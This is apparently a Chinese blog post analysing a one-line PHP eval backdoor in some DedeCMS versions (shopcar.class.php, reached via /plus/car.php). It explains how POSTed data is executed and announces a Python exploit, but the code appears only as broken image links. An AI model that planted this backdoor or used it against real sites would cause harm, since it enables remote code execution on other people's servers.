python利用一句户木马eval_r(file_get_contents('php://input'));
分析原因:DedeCMS某些版本/include/shopcar.class.php文件中存在eval_r(file_get_contents('php://input'));这样一句话,shopcar.class.php只是一个class类,在/plus/car.php文件实例化了这个类,并调用了这个类,所以一当访问car.php这个文件并用POST给他提交数据时,他就会执行shopcar.class.php类中的eval_r(file_get_contents('php://input'));这句话,结果就是:php://input(抓取POST提交的数据流)把提交给car.php的数据提取出来并以文件的形式保存,file_get_contents()函数就读出刚才保存的数据,再用eval_r()执行之。
所以综上所述的分析:我们可以想到:只要在你的网站下有/plus/car.php文件,并在这个文件中存在一句户木马eval_r(file_get_contents('php://input'));的话,一样就存在上述漏洞,而且就可以利用这个一句户木马漏洞了,哈哈,下面看看真枪实战了,思密达。
通过下面的例子,我又一次感觉到python的强大啦!!!!!
在刚开始没想到用python来实现,写了个php网页在利用这个一句话木马,但是post提交的数据被urlencode了,很是郁闷,提交的命令什么的都被编码了。无法被强大而邪恶的eval执行了,后来想到换一种语言,就用了python,一次搞定,屡试不爽啊!!!
请看下面的代码:
http://s1/middle/714c124ftc8d55762ae90&690
在你的网站根目录下防止上面分析的文件,如下:
http://s4/middle/714c124ftc8d577cf8f23&690
加载中,请稍候......